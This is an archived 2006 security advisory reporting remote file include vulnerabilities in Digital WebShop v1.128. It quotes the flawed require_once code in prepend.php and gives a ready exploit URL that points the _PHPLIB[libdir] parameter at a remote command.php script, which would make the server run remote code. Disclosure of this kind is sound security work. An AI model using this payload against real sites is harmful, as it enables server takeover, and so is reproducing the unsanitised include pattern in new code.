Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities

2006-09-20T00:00:00
ID SECURITYVULNS:DOC:14354
Type securityvulns
Reporter Securityvulns
Modified 2006-09-20T00:00:00

Description

Title : Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities

Author : ajann

Script Page : http://digitalwebshop.dyndns.org

Exploit;


[Files] rechnung.php prepend.php [/Files]

[Code,1] prepend.php Error:

// include Werzeuge .. .... require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib"); / Mysql Class/ require_once($_PHPLIB["libdir"] . "messages_inc.php"); / Layout f?r Echos & Prints. / .... ..

Key [:] _PHPLIB[libdir]=http://target.com/command.php?

\Example:

http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?

ajann,Turkey

...

Im not Hacker!